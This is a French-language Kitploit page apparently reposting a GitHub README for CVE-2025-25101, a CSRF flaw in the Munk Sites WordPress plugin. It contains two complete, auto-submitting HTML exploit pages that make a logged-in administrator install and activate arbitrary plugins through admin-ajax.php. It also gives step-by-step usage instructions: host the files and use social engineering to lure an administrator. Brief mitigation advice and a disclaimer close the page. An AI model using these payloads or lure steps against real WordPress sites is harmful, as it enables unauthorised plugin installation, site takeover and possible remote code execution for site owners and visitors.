Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-25101 — Plugin WordPress Munk Sites <= 1.0.7 - Vulnérabilité CSRF permettant l'installation arbitraire de plugins | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-25101
Analyse des VulnérabilitésExploitationExploitation d'Applications WebHameçonnageIngénierie SocialeApprentissage et Éducation
GitHubnxploited/cve-2025-25101

CVE-2025-25101

Plugin WordPress Munk Sites <= 1.0.7 - Vulnérabilité CSRF permettant l'installation arbitraire de plugins

Voir le dépôt
14il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚀 CVE-2025-25101 - Plugin WordPress Munk Sites <= 1.0.7 - CSRF vers l'installation arbitraire de plugins

📌 Aperçu

CVE-2025-25101 est une vulnérabilité de type Cross-Site Request Forgery (CSRF) dans le plugin MetricThemes Munk Sites pour WordPress (versions ≤ 1.0.7).
Cette vulnérabilité permet à un attaquant non authentifié de tromper un administrateur afin qu'il installe et active des plugins arbitraires, ce qui peut potentiellement mener à une exécution de code à distance (RCE) ou à la compromission du site.

🛑 Versions affectées

  • Plugin Munk Sites <= 1.0.7
  • WordPress Toute version où le plugin est actif

🛡️ Évaluation de sécurité (score CVSS)

ScoreSévéritéVersionChaîne vectorielle
9.6🔥 CRITIQUE3.1CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔥 Description de l'exploit

🛠️ Comment fonctionne la vulnérabilité :

La faille CSRF du plugin Munk Sites permet à un attaquant de forcer un administrateur WordPress connecté à installer et à activer n'importe quel plugin WordPress sans son consentement.
Pour cela, l'attaquant exploite une requête admin-ajax.php non protégée qui ne vérifie pas le jeton CSRF.

📌 Déroulement de l'exploit :

  1. L'attaquant crée une page web malveillante contenant la charge utile (payload) CSRF.
  2. La victime (administrateur WordPress) visite la page web de l'attaquant.
  3. L'exploit envoie silencieusement des requêtes à WordPress pour installer et activer un plugin arbitraire.
  4. Le plugin est installé et activé sans aucune interaction de l'administrateur.

💻 Code de l'exploit

1️⃣ Exploit CSRF - Installation du plugin

Cette charge utile force la victime à installer le plugin hello-world.

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Installation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #5bc0de; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Installing plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_install_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>

2️⃣ Exploit CSRF - Activation du plugin

Cette charge utile force la victime à activer le plugin hello-world.

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Activation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #f0ad4e; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Activating plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_active_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>

🔥 Mode d'emploi

  1. Hébergez les fichiers HTML malveillants (install.html et activate.html) sur un serveur contrôlé par l'attaquant.
  2. Utilisez l'ingénierie sociale pour amener un administrateur WordPress à visiter install.html.
  3. Une fois le plugin installé, trompez-le pour qu'il visite activate.html.
  4. Le plugin hello-world sera installé et activé sans le consentement de l'administrateur !

🚧 Atténuation

🔒 Comment protéger votre site WordPress :

  • Mettez à jour le plugin Munk Sites vers la dernière version (si un correctif est disponible).
  • Utilisez un plugin de sécurité WordPress comme Wordfence ou Sucuri pour bloquer les tentatives CSRF.
  • Restreignez l'accès à admin-ajax.php à l'aide de règles de sécurité dans .htaccess ou dans la configuration Nginx.
  • Assurez-vous que seuls les utilisateurs authentifiés et autorisés peuvent installer ou activer des plugins.
  • Implémentez une protection CSRF à l'aide de wp_nonce_field() et de check_admin_referer().

📜 Avertissement

⚠️ Cet exploit est destiné uniquement à des fins éducatives et de recherche en sécurité.
⚠️ Toute utilisation non autorisée contre des systèmes sans permission explicite est illégale.
⚠️ L'auteur n'est pas responsable de toute utilisation abusive de ce code.


⭐ Soutien et contributions

Si vous trouvez cette recherche utile, n'hésitez pas à ⭐ mettre une étoile au dépôt et à contribuer en signalant de nouvelles vulnérabilités.

Par : Nxploit | Khaled Alenazi

Télécharger l’outil